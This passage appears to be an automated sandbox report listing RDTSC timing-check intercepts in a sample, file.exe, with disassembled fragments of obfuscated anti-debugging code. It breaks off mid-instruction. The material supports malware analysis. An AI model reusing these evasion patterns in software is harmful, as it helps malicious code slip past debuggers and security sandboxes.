Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1042A08 second address: 1042A7E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007FDD5537C441h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FDD5537C438h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D30F2h] 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FDD5537C438h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D38B6h], eax 0x00000050 xor dword ptr [ebp+122D3FAEh], edx 0x00000056 xchg eax, esi 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b push edx 0x0000005c pop edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1042A7E second address: 1042A8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5513FC1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1042A8D second address: 1042A98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FDD5537C436h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1042A98 second address: 1042AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FDD5513FC16h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1042AA9 second address: 1042AB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1042AB3 second address: 1042AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1043FB6 second address: 1043FBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10365C9 second address: 10365D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10365D3 second address: 10365D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1039C0A second address: 1039C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FDD5513FC16h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1039C19 second address: 1039C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1039D04 second address: 1039D2F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FDD5513FC22h 0x0000000f jne 00007FDD5513FC16h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jng 00007FDD5513FC16h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1039D2F second address: 1039D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103AD7D second address: 103AD83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103AE2D second address: 103AE33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103AE33 second address: 103AE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103BC35 second address: 103BC47 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a jl 00007FDD5537C43Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103DC52 second address: 103DC57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103DC57 second address: 103DC5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103DC5D second address: 103DC82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5513FC24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FDD5513FC16h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103DC82 second address: 103DC88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10496B5 second address: 10496CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FDD5513FC16h 0x00000009 jnc 00007FDD5513FC16h 0x0000000f jnp 00007FDD5513FC16h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1049980 second address: 104998B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104998B second address: 104998F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104DFE7 second address: 104E01E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C447h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FDD5537C445h 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104E01E second address: 104E036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FDD5513FC1Ch 0x00000012 jns 00007FDD5513FC16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104E036 second address: 104E05D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FDD5537C436h 0x00000009 jmp 00007FDD5537C43Dh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 jl 00007FDD5537C438h 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104E29C second address: 104E2A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104E2A0 second address: 104E2A9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104E2A9 second address: 104E2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104E2B7 second address: 104E2BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104E2BD second address: 104E2C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104E2C2 second address: 104E2C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104E2C8 second address: 104E2D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104E2D9 second address: 104E2DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104E2DD second address: 104E2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104E2E3 second address: 104E2EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104E37D second address: 104E383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1054783 second address: 1054788 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10549C1 second address: 10549D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD5513FC20h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10549D5 second address: 10549DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1054C84 second address: 1054C8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1058636 second address: 105863C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDD0CA second address: FDD10B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FDD5513FC1Ah 0x0000000d push eax 0x0000000e jl 00007FDD5513FC16h 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c jnl 00007FDD5513FC16h 0x00000022 popad 0x00000023 popad 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FDD5513FC23h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDD10B second address: FDD10F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDD10F second address: FDD139 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5513FC1Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jc 00007FDD5513FC16h 0x00000012 je 00007FDD5513FC16h 0x00000018 pop ecx 0x00000019 push ecx 0x0000001a push edx 0x0000001b pop edx 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f push esi 0x00000020 pop esi 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105E00A second address: 105E010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1FBF second address: FE1FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007FDD5513FC18h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1FCE second address: FE1FFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C43Bh 0x00000007 jmp 00007FDD5537C448h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1FFB second address: FE2001 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105D051 second address: 105D071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FDD5537C442h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105D071 second address: 105D077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105D077 second address: 105D07B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105D07B second address: 105D081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105D361 second address: 105D367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105CA40 second address: 105CA46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105CA46 second address: 105CA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FDD5537C443h 0x0000000c jg 00007FDD5537C436h 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FDD5537C43Eh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105CA7B second address: 105CA7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105CA7F second address: 105CA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105CA85 second address: 105CA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105CA8B second address: 105CAA7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FDD5537C444h 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105CAA7 second address: 105CAAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105D8ED second address: 105D8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD5537C43Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105D8FD second address: 105D901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105DA79 second address: 105DA7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105DA7F second address: 105DA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD5513FC1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063644 second address: 106364A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10637C5 second address: 10637D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10637D1 second address: 10637DF instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDD5537C436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10637DF second address: 10637E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063AA1 second address: 1063AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063AA5 second address: 1063AB4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDD5513FC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063C17 second address: 1063C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063C1D second address: 1063C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063F3D second address: 1063F95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDD5537C449h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jnc 00007FDD5537C436h 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007FDD5537C447h 0x00000020 pushad 0x00000021 jmp 00007FDD5537C43Dh 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063F95 second address: 1063F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106411A second address: 106412C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FDD5537C436h 0x0000000c popad 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106412C second address: 106414E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD5513FC1Ch 0x00000009 popad 0x0000000a push ebx 0x0000000b jng 00007FDD5513FC1Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106414E second address: 1064152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10642B9 second address: 10642BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10642BF second address: 10642D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FDD5537C43Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10642D3 second address: 10642E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD5513FC1Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10642E8 second address: 10642EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10642EC second address: 10642F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106472C second address: 1064737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100E098 second address: 100E09C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100E09C second address: 100E0A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100E0A0 second address: 100E0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007FDD5513FC22h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10632F0 second address: 1063301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FDD5537C436h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063301 second address: 1063305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1063305 second address: 1063317 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDD5537C436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FDD5537C436h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106864B second address: 1068650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1024D80 second address: 100D51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FDD5537C445h 0x0000000a popad 0x0000000b push eax 0x0000000c jnp 00007FDD5537C444h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FDD5537C438h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d cmc 0x0000002e movzx edi, bx 0x00000031 lea eax, dword ptr [ebp+12489AE5h] 0x00000037 sub dword ptr [ebp+122D2EABh], edx 0x0000003d nop 0x0000003e push eax 0x0000003f push esi 0x00000040 pushad 0x00000041 popad 0x00000042 pop esi 0x00000043 pop eax 0x00000044 push eax 0x00000045 jmp 00007FDD5537C444h 0x0000004a nop 0x0000004b mov edi, 5E636700h 0x00000050 or dx, 0613h 0x00000055 call dword ptr [ebp+122D1CE2h] 0x0000005b push eax 0x0000005c push edx 0x0000005d push edi 0x0000005e pushad 0x0000005f popad 0x00000060 pushad 0x00000061 popad 0x00000062 pop edi 0x00000063 jmp 